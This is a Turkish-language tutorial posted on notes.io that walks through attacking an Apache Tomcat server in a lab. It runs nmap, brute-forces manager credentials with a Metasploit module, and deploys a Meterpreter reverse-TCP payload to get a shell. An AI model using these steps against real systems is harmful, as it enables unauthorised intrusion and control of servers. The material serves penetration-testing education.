Notes
Notes - notes.io |
Herkese merhaba,
Bu konuda, hedef bir sistemin, "Apache Tomcat" sunucusuna yönelik bir sızma testini nasıl gerçekleştirdiğimi anlatacağım.
"nmap -sV 192.168.127.130" komutu ile nmap ile portların servis ve version bilgilerini tarayalım.
8180. portta, "Apache Tomcat/Coyote JSP Engine 1.1" uygulaması çalışmakta, bizde bu uygulamaya yönelik,
métasploit içerisinde bulunan bir modül ile kaba kuvvet saldırısı uygulayacağız. Apache tomcat uygulamasının kullanıcı adı ve şifresini ele geçirip ardından yine métasploit içerisinde bulunan bir tomcat exploit ile hedef sisteme sızacağız ve meterpreter oturumu elde edeceğiz.
İlk önce "msfconsole" komutu ile métasploit framework’ ümüzü açalım.
Ardından, "use auxiliary/scanner/http/tomcat_mgr_login" modülüne girelim.
show options" komutu ile genel ayarları görelim.
Burada, "set RHOSTS 192.168.127.130" ve "set RPORT 8180" bilgilerini girdikten sonra "exploit" diyerek kaba kuvvet saldırısını gerçekleştiriyoruz.
Ve gördüğünüz gibi, "LOGİN SUCCESSFUL" yazısının yanında, "tomcat:tomcat" olarak kullanıcı adı ve şifre tespit edilmiş.
Artık bu bilgileride öğrendiğimize göre, sıra geldi exploit edip sisteme sızmaya.
"back" komutu ile bulunduğumuz auxiliary modülünden çıkıyoruz.
"use exploit/multi/http/tomcat_mgr_deploy" ile exploitimize giriyoruz.
"show options" ile genel ayarları yapıyoruz.
resimde gördüğünüz gibi gereken bilgileri girdikten sonra "exploit" komutunu çalıştırıyoruz.
Burada ekstradan payload seçmemize gerek yoktu. Çünkü, kendiliğinden "java/meterpreter/reverse_tcp" payload seçiliydi.
"exploit" komutunu verdikten sonra meterpreter oturumumuzu elde ediyoruz ve artık hedef sisteme sızmış bulunmaktayız.
Artık meterpreter komutları çalıştırabilirsiniz..
Shell açıp hedef sisteme girdik, artık ne istersek yapabiliriz
Bu eğitim konumunda sonuna geldim, okuduğunuz için teşekkür ederim .
|
|
Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...
With notes.io;
- * You can take a note from anywhere and any device with internet connection.
- * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
- * You can quickly share your contents without website, blog and e-mail.
- * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
- * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.
Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.
Easy: Notes.io doesn’t require installation. Just write and share note!
Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )
Free: Notes.io works for 12 years and has been free since the day it was started.
You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;
Email: [email protected]
Twitter: http://twitter.com/notesio
Instagram: http://instagram.com/notes.io
Facebook: http://facebook.com/notesio
Regards;
Notes.io Team
